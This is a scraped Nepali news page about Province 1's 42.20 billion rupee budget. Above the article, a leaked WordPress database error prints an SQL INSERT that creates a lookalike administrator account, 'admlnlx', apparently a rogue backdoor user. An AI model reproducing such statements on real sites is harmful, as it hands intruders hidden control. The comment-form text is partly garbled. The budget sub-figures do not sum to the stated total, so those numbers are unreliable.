WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpovG4F4KVYIzE9GBdSvSkjaO8uKn10', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 01:13:17', '', 'admlnlx', 'admlnlx')

यस्तो छ प्रदेश १ सरकारको ४२ अर्ब २० करोडको बजेट (बजेटको पूर्णपाठ सहित) – Gaule Khabar

यस्तो छ प्रदेश १ सरकारको ४२ अर्ब २० करोडको बजेट (बजेटको पूर्णपाठ सहित)

यस्तो छ प्रदेश १ सरकारको ४२ अर्ब २० करोडको बजेट (बजेटको पूर्णपाठ सहित)

गाउँले न्यूज, बिराटनगर । प्रदेश १ ले ४२ अर्ब २० करोडको बजेट ल्याएको छ । आर्थिक मामिलामन्त्री इन्द्र आङ्बोले आइतबार प्रदेशसभा बैठकमा ४२ अर्ब २० करोड ४ लाख १२ हजारको बजेट पेश गरेका हुन् ।

चालु खर्चतर्फ १८ अर्ब २० करोड ४ लाख १२ हजार र पुँजीगततर्फ २३ अर्ब ५७ करोड ३९ लाख ३४ हजार विनियोजन गरिएको छ । अन्तर सरकारी हस्तान्तरणका लागि ९९ करोड ९९ लाख ९८ हजार छुट्याइएको छ

सुची हेर्न यहाँ क्लिक गर्नुस्  बजेट-वक्तव्य-२०७६-फाइनल

https://gaulenews.com/?p=46752

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका